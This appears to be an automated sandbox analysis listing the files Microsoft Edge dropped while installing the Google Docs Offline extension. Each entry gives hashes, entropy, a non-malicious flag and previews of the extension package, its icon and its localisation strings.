                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\8ae9d68b-aa2d-4399-b197-353299736ab5.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):154477
                                                                                                                                                                                                                                                                              Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                              MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                              SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                              SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                              SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4982
                                                                                                                                                                                                                                                                              Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                              MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                              SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                              SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                              SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):908
                                                                                                                                                                                                                                                                              Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                              MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                              SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                              SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                              SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1285
                                                                                                                                                                                                                                                                              Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                              MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                              SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                              SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                              SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                                                                                              Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                              MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                              SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                              SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                              SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                              Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                              MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                              SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                              SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                              SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3107
                                                                                                                                                                                                                                                                              Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                              MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                              SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                              SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                              SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1389
                                                                                                                                                                                                                                                                              Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                              MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                              SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                              SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                              SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1763
                                                                                                                                                                                                                                                                              Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                              MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                              SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                              SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                              SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):930
                                                                                                                                                                                                                                                                              Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                              MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                              SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                              SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                              SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):913
                                                                                                                                                                                                                                                                              Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                              MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                              SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                              SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                              SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):806
                                                                                                                                                                                                                                                                              Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                              MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                              SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                              SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                              SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):883
                                                                                                                                                                                                                                                                              Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                              MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                              SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                              SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                              SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                              Malicious:false
